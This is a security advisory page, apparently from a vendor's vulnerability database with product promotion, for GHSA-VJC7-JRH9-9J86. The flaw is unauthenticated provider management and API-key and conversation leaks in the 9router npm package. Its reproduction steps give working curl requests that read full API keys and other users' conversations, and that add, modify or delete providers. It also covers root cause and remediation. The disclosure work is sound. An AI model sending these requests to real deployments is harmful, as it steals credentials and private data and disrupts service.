GHSA-VJC7-JRH9-9J86

GHSA-VJC7-JRH9-9J86 is a critical-severity missing authentication for critical function vulnerability in 9router (npm), affecting versions <= 0.4.41. No fixed version is listed yet.

Summary

9router has unauthenticated CRUD on /api/providers and Full API Key Leak via /api/usage/stats

Full technical description

title: Unauthenticated CRUD on /api/providers and Full API Key Leak via /api/usage/stats
product: 9Router
version: <= 0.4.41
severity: critical
cve_request: true

Multiple critical API security vulnerabilities were discovered in 9Router's Next.js dashboard. The /api/providers endpoints lack authentication entirely, allowing anyone to create, read, update, and delete provider connections. Additionally, /api/usage/stats exposes full plaintext API keys, and /api/usage/request-logs + /api/usage/request-details expose all users' request history and full conversation contents (including system prompts, user messages, assistant responses) without authentication.

Affected Endpoints

Endpoint Method Issue
/api/providers GET Lists all provider connections with partial credentials, OAuth tokens, account IDs
/api/providers/:id GET Read any single provider detail (IDOR)
/api/providers POST Create arbitrary provider connections with attacker-controlled API keys
/api/providers/:id PUT Modify any existing provider connection
/api/providers/:id DELETE Delete any provider connection
/api/usage/stats GET Exposes full plaintext API keys, per-account usage breakdown, cost data
/api/usage/request-logs GET Exposes all users' request logs (model, tokens, cost, timestamp, provider)
/api/usage/request-details/:id GET Exposes full conversation turns including system prompts, user messages, assistant responses
/api/version GET Exposes current version info
/api/models GET Exposes full model routing catalog
/api/v1/models GET Exposes model list

Critical: Provider CRUD without authentication

An attacker can:

  1. Add a malicious provider, inject a provider that proxies through their server, capturing all prompts, responses, and API keys routed through 9Router
  2. Modify existing providers, replace API keys with attacker-controlled ones, redirect traffic
  3. Delete all providers, cause complete denial of service
  4. Read all provider configurations, harvest partial credentials, GitHub Copilot OAuth tokens, Cloudflare account IDs, email addresses

Critical: Full API key leak via /api/usage/stats

The endpoint returns complete API key strings (e.g., sk-...) in plaintext alongside usage data per key, enabling unauthorized use of connected AI provider accounts.

Critical: Conversation history leak

/api/usage/request-details returns the full conversation history of other users' AI sessions, including system prompts, user messages, assistant responses, tool calls, and reasoning traces.

Steps to Reproduce

1. Unauthenticated read of all providers

curl -s https://<host>/api/providers

Returns all provider connections with email addresses, auth type, account IDs, and partial API key prefixes.

2. Create a provider without authentication

curl -X POST https://<host>/api/providers \
  -H "Content-Type: application/json" \
  -d '{"provider":"openai","authType":"apikey","name":"rogue","apiKey":"sk-attacker-controlled"}'

Returns the created connection object with a new UUID and isActive: true.

3. Modify an existing provider without authentication

curl -X PUT https://<host>/api/providers/<existing-uuid> \
  -H "Content-Type: application/json" \
  -d '{"name":"modified","apiKey":"sk-attacker-key"}'

Returns the updated connection object.

4. Delete a provider without authentication

curl -X DELETE https://<host>/api/providers/<existing-uuid>

Returns {"message":"Connection deleted successfully"}.

5. Read full usage stats with API keys

curl -s https://<host>/api/usage/stats

Returns full API key strings, per-account token/cost breakdown, recent requests.

6. Read request logs

curl -s "https://<host>/api/usage/request-logs?page=1&pageSize=50"

Returns paginated request logs with timestamps, models, providers, user emails, token counts.

7. Read full conversation

curl -s https://<host>/api/usage/request-details/<request-uuid>

Returns complete conversation turns for that request.

8. Read version info

curl -s https://<host>/api/version

Returns {"currentVersion":"0.4.19","latestVersion":"0.4.45","hasUpdate":true}.

Root Cause

The Next.js API routes under src/app/api/* lack authentication middleware on several endpoints. Specifically:

  • /api/providers/*, No auth check before CRUD operations on provider connections stored in the database
  • /api/usage/stats, No auth check before returning aggregated usage data including full API keys
  • /api/usage/request-logs, No auth check before returning request history
  • /api/usage/request-details/:id, No auth check before returning full conversation contents

Resources

Impact

A critical operation is accessible without requiring any authentication. Typical impact: any user can invoke the privileged function.

GHSA-VJC7-JRH9-9J86 has a CVSS score of 10.0 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

9router (<= 0.4.41)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Already deployed Kodem?

See it in your environmentNew to Kodem? Get a demo →

Remediation advice

  1. Add authentication middleware to all /api/providers/* routes (GET, POST, PUT, DELETE)
  2. Add authentication middleware to all /api/usage/* routes
  3. Never return full API key strings in any API response, return masked keys only
  4. Never return GitHub Copilot tokens or similar OAuth secrets in API responses
  5. Implement proper authorization checks so users can only access their own data
  6. Add rate limiting to public endpoints

Frequently Asked Questions

  1. What is GHSA-VJC7-JRH9-9J86? GHSA-VJC7-JRH9-9J86 is a critical-severity missing authentication for critical function vulnerability in 9router (npm), affecting versions <= 0.4.41. No fixed version is listed yet. A critical operation is accessible without requiring any authentication.
  2. How severe is GHSA-VJC7-JRH9-9J86? GHSA-VJC7-JRH9-9J86 has a CVSS score of 10.0 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of 9router are affected by GHSA-VJC7-JRH9-9J86? 9router (npm) versions <= 0.4.41 is affected.
  4. Is there a fix for GHSA-VJC7-JRH9-9J86? No fixed version is listed for GHSA-VJC7-JRH9-9J86 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is GHSA-VJC7-JRH9-9J86 exploitable, and should I be worried? Whether GHSA-VJC7-JRH9-9J86 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether GHSA-VJC7-JRH9-9J86 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix GHSA-VJC7-JRH9-9J86? No fixed version is listed yet. In the interim: Keep the dependency up to date. Add authentication gating to all sensitive endpoints.

Other vulnerabilities in 9router

Stop the waste.
Protect your environment with Kodem.